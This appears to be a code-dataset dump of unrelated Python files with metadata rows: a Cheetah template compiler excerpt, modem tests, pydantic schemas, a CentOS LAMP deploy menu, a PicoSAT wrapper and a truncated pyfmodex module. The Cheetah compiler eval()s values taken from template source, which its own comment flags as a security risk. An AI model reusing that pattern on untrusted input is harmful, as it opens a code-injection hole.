        if self.__dict__.has_key(name):
            return self.__dict__[name]
        elif hasattr(self.__class__, name):
            return getattr(self.__class__, name)
        elif self._activeClassesList and hasattr(self._activeClassesList[-1], name):
            return getattr(self._activeClassesList[-1], name)
        else:
            raise AttributeError, name

    def _initializeSettings(self):
        # start from a deep copy so per-instance tweaks never leak into the
        # shared default settings dict
        self.updateSettings(copy.deepcopy(DEFAULT_COMPILER_SETTINGS))

    def _setupCompilerState(self):
        """Initialize all per-compilation state: class stacks, module header
        pieces, and the default import/constant blocks for generated modules."""
        self._activeClassesList = []
        self._finishedClassesList = []      # listed by ordered
        self._finishedClassIndex = {}  # listed by name
        self._moduleDef = None
        self._moduleShBang = '#!/usr/bin/env python'
        self._moduleEncoding = 'ascii'
        self._moduleEncodingStr = ''
        self._moduleHeaderLines = []
        self._moduleDocStringLines = []
        self._specialVars = {}
        # import lines emitted at the top of every generated module
        self._importStatements = [
            "import sys",
            "import os",
            "import os.path",
            "from os.path import getmtime, exists",
            "import time",
            "import types",
            "import __builtin__",
            "from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion",
            "from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple",
            "from Cheetah.Template import Template",
            "from Cheetah.DummyTransaction import DummyTransaction",
            "from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList",
            "from Cheetah.CacheRegion import CacheRegion",
            "import Cheetah.Filters as Filters",
            "import Cheetah.ErrorCatchers as ErrorCatchers",
            ]
        # names the generated module already has in scope (used by #extends
        # to decide whether an implied import is needed)
        self._importedVarNames = ['sys',
                                  'os',
                                  'os.path',
                                  'time',
                                  'types',
                                  'Template',
                                  'DummyTransaction',
                                  'NotFound',
                                  'Filters',
                                  'ErrorCatchers',
                                  'CacheRegion',
                                  ]
        # module-level constants for the generated module; the try/except
        # defines True/False for very old Pythons
        self._moduleConstants = [
            "try:",
            "    True, False",
            "except NameError:",
            "    True, False = (1==1), (1==0)",
            "VFFSL=valueFromFrameOrSearchList",
            "VFSL=valueFromSearchList",
            "VFN=valueForName",
            "currentTime=time.time",
            ]

    def compile(self):
        """Run the parser over the source, producing the finished class(es)."""
        classCompiler = self._spawnClassCompiler(self._mainClassName)
        if self._baseclassName:
            classCompiler.setBaseClass(self._baseclassName)
        self._addActiveClassCompiler(classCompiler)
        self._parser.parse()
        self._swallowClassCompiler(self._popActiveClassCompiler())
        self._compiled = True
        self._parser.cleanup()

    def _spawnClassCompiler(self, className, klass=None):
        if klass is None:
            klass = self.classCompilerClass
        classCompiler = klass(className,
                              moduleCompiler=self,
                              mainMethodName=self.setting('mainMethodName'),
                              fileName=self._filePath,
                              settingsManager=self,
                              )
        return classCompiler

    def _addActiveClassCompiler(self, classCompiler):
        self._activeClassesList.append(classCompiler)

    def _getActiveClassCompiler(self):
        return self._activeClassesList[-1]

    def _popActiveClassCompiler(self):
        return self._activeClassesList.pop()

    def _swallowClassCompiler(self, classCompiler):
        """Finalize a class compiler and record it by order and by name."""
        classCompiler.cleanupState()
        self._finishedClassesList.append( classCompiler )
        self._finishedClassIndex[classCompiler.className()] = classCompiler
        return classCompiler

    def _finishedClasses(self):
        return self._finishedClassesList

    def importedVarNames(self):
        return self._importedVarNames

    def addImportedVarNames(self, varNames):
        self._importedVarNames.extend(varNames)

    ## methods for adding stuff to the module and class definitions

    def setBaseClass(self, baseClassName):
        """Handle the #extends directive: set the base class on the active
        class compiler, adding an implied import when the name is not
        already available in the generated module."""
        if self._mainMethodNameArg:
            self.setMainMethodName(self._mainMethodNameArg)
        else:
            self.setMainMethodName(self.setting('mainMethodNameForSubclasses'))
        if self.setting('handlerForExtendsDirective'):
            handler = self.setting('handlerForExtendsDirective')
            baseClassName = handler(compiler=self, baseClassName=baseClassName)
            self._getActiveClassCompiler().setBaseClass(baseClassName)
        elif (not self.setting('autoImportForExtendsDirective')
              or baseClassName=='object' or baseClassName in self.importedVarNames()):
            self._getActiveClassCompiler().setBaseClass(baseClassName)
            # no need to import
        else:
            ##################################################
            ## If the #extends directive contains a classname or modulename that isn't
            #  in self.importedVarNames() already, we assume that we need to add
            #  an implied 'from ModName import ClassName' where ModName == ClassName.
            #  - This is the case in WebKit servlet modules.
            #  - We also assume that the final . separates the classname from the
            #    module name.  This might break if people do something really fancy
            #    with their dots and namespaces.
            chunks = baseClassName.split('.')
            if len(chunks)==1:
                self._getActiveClassCompiler().setBaseClass(baseClassName)
                if baseClassName not in self.importedVarNames():
                    modName = baseClassName
                    # we assume the class name to be the module name
                    # and that it's not a builtin:
                    importStatement = "from %s import %s" % (modName, baseClassName)
                    self.addImportStatement(importStatement)
                    self.addImportedVarNames( [baseClassName,] )
            else:
                needToAddImport = True
                modName = chunks[0]
                #print chunks, ':', self.importedVarNames()
                for chunk in chunks[1:-1]:
                    if modName in self.importedVarNames():
                        needToAddImport = False
                        finalBaseClassName = baseClassName.replace(modName+'.', '')
                        self._getActiveClassCompiler().setBaseClass(finalBaseClassName)
                        break
                    else:
                        modName += '.'+chunk
                if needToAddImport:
                    modName, finalClassName = '.'.join(chunks[:-1]), chunks[-1]
                    #if finalClassName != chunks[:-1][-1]:
                    if finalClassName != chunks[-2]:
                        # we assume the class name to be the module name
                        modName = '.'.join(chunks)
                    self._getActiveClassCompiler().setBaseClass(finalClassName)
                    importStatement = "from %s import %s" % (modName, finalClassName)
                    self.addImportStatement(importStatement)
                    self.addImportedVarNames( [finalClassName,] )

    def setCompilerSetting(self, key, valueExpr):
        # SECURITY NOTE: valueExpr originates from a #compiler-settings
        # directive inside the template source and is eval()'d here --
        # only compile trusted templates.
        self.setSetting(key, eval(valueExpr) )
        self._parser.configureParser()

    def setCompilerSettings(self, keywords, settingsStr):
        """Apply a #compiler-settings block; keywords select reset/merge
        behavior and the settings format (python vs. config)."""
        KWs = keywords
        merge = True
        if 'nomerge' in KWs:
            merge = False

        if 'reset' in KWs:
            # @@TR: this is actually caught by the parser at the moment.
            # subject to change in the future
            self._initializeSettings()
            self._parser.configureParser()
            return
        elif 'python' in KWs:
            settingsReader = self.updateSettingsFromPySrcStr
            # this comes from SettingsManager
        else:
            # this comes from SettingsManager
            settingsReader = self.updateSettingsFromConfigStr

        settingsReader(settingsStr)
        self._parser.configureParser()

    def setShBang(self, shBang):
        self._moduleShBang = shBang

    def setModuleEncoding(self, encoding):
        self._moduleEncoding = encoding
        self._moduleEncodingStr = '# -*- coding: %s -*-' %encoding

    def getModuleEncoding(self):
        return self._moduleEncoding

    def addModuleHeader(self, line):
        """Adds a header comment to the top of the generated module.
        """
        self._moduleHeaderLines.append(line)

    def addModuleDocString(self, line):
        """Adds a line to the generated module docstring.
        """
        self._moduleDocStringLines.append(line)

    def addModuleGlobal(self, line):
        """Adds a line of global module code.  It is inserted after the import
        statements and Cheetah default module constants.
        """
        self._moduleConstants.append(line)

    def addSpecialVar(self, basename, contents, includeUnderscores=True):
        """Adds module __specialConstant__ to the module globals.
        """
        name = includeUnderscores and '__'+basename+'__' or basename
        self._specialVars[name] = contents.strip()

    def addImportStatement(self, impStatement):
        """Record an import line for the generated module and register the
        names it binds (so #extends can avoid duplicate imports)."""
        self._importStatements.append(impStatement)

        #@@TR 2005-01-01: there's almost certainly a cleaner way to do this!
        importVarNames = impStatement[impStatement.find('import') + len('import'):].split(',')
        importVarNames = [var.split()[-1] for var in importVarNames] # handles aliases
        importVarNames = [var for var in importVarNames if var!='*']
        self.addImportedVarNames(importVarNames) #used by #extend for auto-imports

    def addAttribute(self, attribName, expr):
        self._getActiveClassCompiler().addAttribute(attribName + ' =' + expr)

    def addComment(self, comm):
        """Route a ## comment: special vars, doc:/header: prefixes, or a
        plain method comment."""
        if re.match(r'#+$',comm):      # skip bar comments
            return

        specialVarMatch = specialVarRE.match(comm)
        if specialVarMatch:
            # @@TR: this is a bit hackish and is being replaced with
            # #set module varName = ...
            return self.addSpecialVar(specialVarMatch.group(1),
                                      comm[specialVarMatch.end():])
        elif comm.startswith('doc:'):
            addLine = self.addMethDocString
            comm = comm[len('doc:'):].strip()
        elif comm.startswith('doc-method:'):
            addLine = self.addMethDocString
            comm = comm[len('doc-method:'):].strip()
        elif comm.startswith('doc-module:'):
            addLine = self.addModuleDocString
            comm = comm[len('doc-module:'):].strip()
        elif comm.startswith('doc-class:'):
            addLine = self.addClassDocString
            comm = comm[len('doc-class:'):].strip()
        elif comm.startswith('header:'):
            addLine = self.addModuleHeader
            comm = comm[len('header:'):].strip()
        else:
            addLine = self.addMethComment

        for line in comm.splitlines():
            addLine(line)

    ## methods for module code wrapping

    def getModuleCode(self):
        """Return the generated module source, compiling on first call."""
        if not self._compiled:
            self.compile()
        if self._moduleDef:
            return self._moduleDef
        else:
            return self.wrapModuleDef()

    __str__ = getModuleCode

    def wrapModuleDef(self):
        """Assemble and cache the full module text from its pieces."""
        self.addSpecialVar('CHEETAH_docstring', self.setting('defDocStrMsg'))
        self.addModuleGlobal('__CHEETAH_version__ = %r'%Version)
        self.addModuleGlobal('__CHEETAH_versionTuple__ = %r'%(VersionTuple,))
        self.addModuleGlobal('__CHEETAH_genTime__ = %r'%time.time())
        self.addModuleGlobal('__CHEETAH_genTimestamp__ = %r'%self.timestamp())
        if self._filePath:
            timestamp = self.timestamp(self._fileMtime)
            self.addModuleGlobal('__CHEETAH_src__ = %r'%self._filePath)
            self.addModuleGlobal('__CHEETAH_srcLastModified__ = %r'%timestamp)
        else:
            self.addModuleGlobal('__CHEETAH_src__ = None')
            self.addModuleGlobal('__CHEETAH_srcLastModified__ = None')

        moduleDef = """%(header)s
%(docstring)s
##################################################
## DEPENDENCIES
%(imports)s
##################################################
## MODULE CONSTANTS
%(constants)s
%(specialVars)s
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
    raise AssertionError(
      'This template was compiled with Cheetah version'
      ' %%s. Templates compiled before version %%s must be recompiled.'%%(
         __CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
%(classes)s
## END CLASS DEFINITION
if not hasattr(%(mainClassName)s, '_initCheetahAttributes'):
    templateAPIClass = getattr(%(mainClassName)s, '_CHEETAH_templateClass', Template)
    templateAPIClass._addCheetahPlumbingCodeToClass(%(mainClassName)s)
%(footer)s
""" % {'header':self.moduleHeader(),
       'docstring':self.moduleDocstring(),
       'specialVars':self.specialVars(),
       'imports':self.importStatements(),
       'constants':self.moduleConstants(),
       'classes':self.classDefs(),
       'footer':self.moduleFooter(),
       'mainClassName':self._mainClassName,
       }

        self._moduleDef = moduleDef
        return moduleDef

    def timestamp(self, theTime=None):
        if not theTime:
            theTime = time.time()
        return time.asctime(time.localtime(theTime))

    def moduleHeader(self):
        header = self._moduleShBang + '\n'
        header += self._moduleEncodingStr + '\n'
        if self._moduleHeaderLines:
            offSet = self.setting('commentOffset')
            header += (
                '#' + ' '*offSet +
                ('\n#'+ ' '*offSet).join(self._moduleHeaderLines) + '\n')
        return header

    def moduleDocstring(self):
        if not self._moduleDocStringLines:
            return ''
        return ('"""' +
                '\n'.join(self._moduleDocStringLines) +
                '\n"""\n')

    def specialVars(self):
        # emit the __special__ vars sorted by name for stable output
        chunks = []
        theVars = self._specialVars
        keys = theVars.keys()
        keys.sort()
        for key in keys:
            chunks.append(key + ' = ' + repr(theVars[key]) )
        return '\n'.join(chunks)

    def importStatements(self):
        return '\n'.join(self._importStatements)

    def moduleConstants(self):
        return '\n'.join(self._moduleConstants)

    def classDefs(self):
        classDefs = [str(klass) for klass in self._finishedClasses() ]
        return '\n\n'.join(classDefs)

    def moduleFooter(self):
        return """
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
    from Cheetah.TemplateCmdLineIface import CmdLineIface
    CmdLineIface(templateObj=%(className)s()).run()
""" % {'className':self._mainClassName}
##################################################
## Make Compiler an alias for ModuleCompiler
# Backwards-compatible public name: `from Cheetah.Compiler import Compiler`.
Compiler = ModuleCompiler
| 39.631206 | 117 | 0.585323 | 7,017 | 78,232 | 6.403734 | 0.151917 | 0.03899 | 0.011617 | 0.008323 | 0.212462 | 0.170802 | 0.13297 | 0.110404 | 0.095249 | 0.081629 | 0 | 0.004518 | 0.301245 | 78,232 | 1,973 | 118 | 39.651292 | 0.817488 | 0.071723 | 0 | 0.248603 | 0 | 0.005587 | 0.170615 | 0.06223 | 0.000698 | 0 | 0 | 0 | 0.002793 | 0 | null | null | 0.010475 | 0.045391 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466a34ecb0421da1e44f26b4a2ebb96b4fc1273b | 1,267 | py | Python | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 11 | 2019-02-07T16:13:59.000Z | 2021-08-14T03:53:14.000Z | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | null | null | null | tests/simple_cmd_checks.py | Rhoynar/plmn-regression | fa58819a405b45430bbde28e52b356e04867aaa3 | [
"MIT"
] | 3 | 2019-02-07T16:14:09.000Z | 2021-08-14T05:09:17.000Z | # -*- coding: utf-8 -*-
import compat
import unittest
import sys
from plmn.utils import *
from plmn.results import *
from plmn.modem_cmds import *
from plmn.simple_cmds import *
class SimpleCmdChecks(unittest.TestCase):
    """Smoke tests for the ModemManager 'simple status' command wrappers.

    Uses unittest assertion methods instead of bare `assert` statements:
    bare asserts are stripped under `python -O` and produce no diagnostic
    message on failure.  `assertIs` preserves the original `is True` /
    `is False` identity semantics.
    """

    def test_simple_status_cmd(self):
        # Running the command should record a 'Simple Status' result entry.
        SimpleCmds.simple_status_cmd()
        self.assertIsNotNone(Results.get_state('Simple Status'))

    def test_simple_status_get_reg_status(self):
        # Just verify the call completes without raising.
        SimpleCmds.simple_status_get_reg_status()

    def test_simple_status_is_registered(self):
        self.assertIs(SimpleCmds.simple_status_is_registered(), True)

    def test_simple_status_is_home(self):
        self.assertIs(SimpleCmds.simple_status_is_home(), True)
        self.assertIs(SimpleCmds.simple_status_is_roaming(), False)

    @unittest.skip('Skipping this test since this is only applicable in connected state')
    def test_simple_status_is_connected(self):
        self.assertIs(SimpleCmds.simple_status_is_connected(), True)

    @unittest.skip('Skipping this as this is only applicable for Roaming scenario')
    def test_simple_status_is_roaming(self):
        self.assertIs(SimpleCmds.simple_status_is_roaming(), True)
if __name__ == '__main__':
nargs = process_args()
unittest.main(argv=sys.argv[nargs:], exit=False)
Results.print_results()
| 31.675 | 89 | 0.750592 | 174 | 1,267 | 5.132184 | 0.316092 | 0.18813 | 0.156775 | 0.12766 | 0.353863 | 0.206047 | 0.087346 | 0 | 0 | 0 | 0 | 0.000953 | 0.17206 | 1,267 | 39 | 90 | 32.487179 | 0.850334 | 0.016575 | 0 | 0 | 0 | 0 | 0.119775 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.214286 | false | 0 | 0.25 | 0 | 0.5 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466ccc900104e36f636478253e917a965c1df4d3 | 371 | py | Python | app/schemas/email.py | waynesun09/notify-service | 768a0db264a9e57eecce283108878e24e8d3b740 | [
"MIT"
] | 5 | 2020-12-20T17:10:46.000Z | 2021-08-20T05:00:58.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 13 | 2021-01-07T14:17:14.000Z | 2022-01-05T20:36:36.000Z | app/schemas/email.py | RedHatQE/notify-service | 579e995fae0c472f9fbd27471371a2c404d94f66 | [
"MIT"
] | 1 | 2022-01-06T22:21:09.000Z | 2022-01-06T22:21:09.000Z | from typing import Optional, List
from pydantic import BaseModel, EmailStr
from . import result
class EmailBase(BaseModel):
email: Optional[EmailStr] = None
class EmailSend(EmailBase):
msg: str
class EmailResult(BaseModel):
pre_header: Optional[str] = None
begin: Optional[str] = None
content: List[result.Result]
end: Optional[str] = None
| 18.55 | 40 | 0.719677 | 45 | 371 | 5.911111 | 0.488889 | 0.12406 | 0.169173 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191375 | 371 | 19 | 41 | 19.526316 | 0.886667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466d4b83456bbb93d38bc63179c0f99d00a30a62 | 2,422 | py | Python | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | 3 | 2015-04-08T18:41:02.000Z | 2015-10-28T09:54:47.000Z | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | DeployScript.py | junoteam/TelegramBot | 3e679637a5918c4f9595beaa2f0f67c9e4467056 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: Alex -*-
from Centos6_Bit64 import *
from SystemUtils import *
# Checking version of OS should happened before menu appears
# Check version of CentOS
SystemUtils.check_centos_version()
# Clear screen before to show menu
os.system('clear')
answer = True
while answer:
print ("""
LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit:
---------------------------------------------------
1. Check version of your CentOS
2. Check Internet connection
3. Show me my local IP address
4. Open port 80 to Web
5. Show me my localhost name
------- LAMP for CentOS 6.x -----------
6. Install EPEL & IUS repository
7. Install Web Server - Apache
8. Install Database - MySQL
9. Install Language - PHP
10. Install LAMP in "One Click" - CentOS 6.x
11. Exit/Quit
""")
answer = input("Please make your choice: ")
if answer == 1:
os.system('clear')
print ('\nChecking version of the system: ')
SystemUtils.check_centos_version()
elif answer == 2:
os.system('clear')
print ('\nChecking if you connected to the Internet')
SystemUtils.check_internet_connection()
elif answer == 3:
os.system('clear')
print ('\nYour local IP address is: ' + SystemUtils.check_local_ip())
elif answer == 4:
os.system('clear')
print('\nChecking firewall')
Centos6Deploy.iptables_port()
elif answer == 5:
print "Checking local hostname..."
SystemUtils.check_host_name()
elif answer == 6:
print ('\nInstalling EPEL and IUS repository to the system...')
Centos6Deploy.add_repository()
elif answer == 7:
print ('\nInstalling Web Server Apache...')
Centos6Deploy.install_apache()
elif answer == 8:
print ('\nInstalling database MySQL...')
Centos6Deploy.install_mysql()
elif answer == 9:
print('\nInstalling PHP...')
Centos6Deploy.install_php()
elif answer == 10:
print ('Install LAMP in "One Click" - CentOS 6.x')
Centos6Deploy.iptables_port()
Centos6Deploy.add_repository()
Centos6Deploy.install_mysql()
Centos6Deploy.install_php()
elif answer == 11:
print("\nGoodbye...\n")
answer = None
else:
print ('\nNot valid Choice, Try Again')
answer = True | 31.051282 | 77 | 0.604872 | 289 | 2,422 | 5 | 0.377163 | 0.069204 | 0.044983 | 0.049827 | 0.141869 | 0.040138 | 0.040138 | 0.040138 | 0 | 0 | 0 | 0.02905 | 0.260941 | 2,422 | 78 | 78 | 31.051282 | 0.778212 | 0.073906 | 0 | 0.261538 | 0 | 0 | 0.422699 | 0.022788 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.030769 | null | null | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466e8b57966faf4a0cc17febbe2a82c29fab5e61 | 802 | py | Python | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | null | null | null | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 1 | 2019-10-16T14:00:25.000Z | 2019-11-11T16:23:20.000Z | setup.py | greenaddress/txjsonrpc | 272d44db43d36645ba981c6e7fa73e33c1fbb7d5 | [
"MIT"
] | 2 | 2017-05-15T06:03:27.000Z | 2019-07-21T09:04:24.000Z | from __future__ import absolute_import
from setuptools import setup
from txjsonrpc import meta
from txjsonrpc.util import dist
setup(
name=meta.display_name,
version=meta.version,
description=meta.description,
author=meta.author,
author_email=meta.author_email,
url=meta.url,
license=meta.license,
packages=dist.findPackages(meta.library_name),
long_description=dist.catReST(
"docs/PRELUDE.txt",
"README",
"docs/DEPENDENCIES.txt",
"docs/INSTALL.txt",
"docs/USAGE.txt",
"TODO",
"docs/HISTORY.txt",
stop_on_errors=True,
out=True),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python",
],
)
| 24.30303 | 50 | 0.63591 | 87 | 802 | 5.724138 | 0.551724 | 0.052209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001669 | 0.253117 | 802 | 32 | 51 | 25.0625 | 0.829716 | 0 | 0 | 0 | 0 | 0 | 0.229426 | 0.026185 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.137931 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
466f047e17e0d6d7208910c763a4df77317279f9 | 4,596 | py | Python | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 233 | 2016-02-05T20:13:06.000Z | 2022-03-26T13:01:10.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 8 | 2017-12-20T17:07:58.000Z | 2020-08-06T15:44:55.000Z | tt/satisfiability/picosat.py | fkromer/tt | b4dfc90f7d0f9b5794e1f5054b640e22f6f75bf7 | [
"MIT"
] | 15 | 2016-03-22T23:37:56.000Z | 2022-02-27T17:51:08.000Z | """Python wrapper around the _clibs PicoSAT extension."""
import os
from tt.errors.arguments import (
InvalidArgumentTypeError,
InvalidArgumentValueError)
if os.environ.get('READTHEDOCS') != 'True':
from tt._clibs import picosat as _c_picosat
VERSION = _c_picosat.VERSION
def sat_one(clauses, assumptions=None):
"""Find a solution that satisfies the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: If solution is found, a list of ints representing the terms of
the solution; otherwise, if no solution found, ``None``.
:rtype: List[:class:`int <python:int>`] or ``None``
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Let's look at a simple example with no satisfiable solution::
>>> from tt import picosat
>>> picosat.sat_one([[1], [-1]]) is None
True
Here's an example where a solution exists::
>>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]])
[1, -2, -3]
Finally, here's an example using assumptions::
>>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3])
[-1, 2, -3]
"""
try:
return _c_picosat.sat_one(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
def sat_all(clauses, assumptions=None):
"""Find all solutions that satisfy the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: An iterator of solutions; if no satisfiable solutions exist, the
iterator will be empty.
:rtype: Iterator[List[:class:`int <python:int>`]]
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Here's an example showing the basic usage::
>>> from tt import picosat
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]):
... print(solution)
...
[1, 2, 3, 4]
[1, 2, 3, -4]
[1, 2, -3, 4]
[1, 2, -3, -4]
[1, -2, 3, 4]
[1, -2, 3, -4]
We can cut down on some of the above solutions by including an assumption::
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]],
... assumptions=[-3]):
... print(solution)
...
[1, 2, -3, 4]
[1, 2, -3, -4]
"""
try:
return _c_picosat.sat_all(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
| 37.672131 | 79 | 0.650131 | 615 | 4,596 | 4.821138 | 0.239024 | 0.012816 | 0.014165 | 0.013491 | 0.715346 | 0.662057 | 0.662057 | 0.662057 | 0.649916 | 0.649916 | 0 | 0.020011 | 0.238903 | 4,596 | 121 | 80 | 37.983471 | 0.827616 | 0.766319 | 0 | 0.47619 | 0 | 0 | 0.019182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4671817d5486f1ffa5048135771d27e1109e5cdd | 12,349 | py | Python | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T16:46:21.000Z | 2017-02-21T16:46:21.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | 1 | 2017-02-21T17:57:05.000Z | 2017-02-22T11:28:51.000Z | src/pyfmodex/sound.py | Loodoor/UnamedPy | 7d154c3a652992b3c1f28050f0353451f57b2a2d | [
"MIT"
] | null | null | null | from .fmodobject import *
from .fmodobject import _dll
from .structures import TAG, VECTOR
from .globalvars import get_class
class ConeSettings(object):
def __init__(self, sptr):
self._sptr = sptr
self._in = c_float()
self._out = c_float()
self._outvol = c_float()
ckresult(_dll.FMOD_Sound_Get3DConeSettings(self._sptr, byref(self._in), byref(self._out), byref(self._outvol)))
@property
def inside_angle(self):
return self._in.value
@inside_angle.setter
def inside_angle(self, angle):
self._in = c_float(angle)
self._commit()
@property
def outside_angle(self):
return self._out.value
@outside_angle.setter
def outside_angle(self, angle):
self._out = c_float(angle)
self._commit()
@property
def outside_volume(self):
return self._outvol.value
@outside_volume.setter
def outside_volume(self, vol):
self._outvol = c_float(vol)
self._commit()
def _commit(self):
ckresult(_dll.FMOD_Sound_Set3DConeSettings(self._sptr, self._in, self._out, self._outvol))
class Sound(FmodObject):
def add_sync_point(self, offset, offset_type, name):
s_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_AddSyncPoint(self._ptr, offset, offset_type, name, byref(s_ptr)))
return s_ptr
def delete_sync_point(self, point):
ckresult(_dll.FMOD_Sound_DeleteSyncPoint(self._ptr, point))
@property
def threed_cone_settings(self):
return ConeSettings(self._ptr)
@property
def custom_rolloff(self):
"""Returns the custom rolloff curve.
:rtype: List of [x, y, z] lists.
"""
num = c_int()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", None, byref(num))
curve = (VECTOR * num.value)()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", byref(curve), 0)
return [p.to_list() for p in curve]
@custom_rolloff.setter
def custom_rolloff(self, curve):
"""Sets the custom rolloff curve.
:param curve: The curve to set.
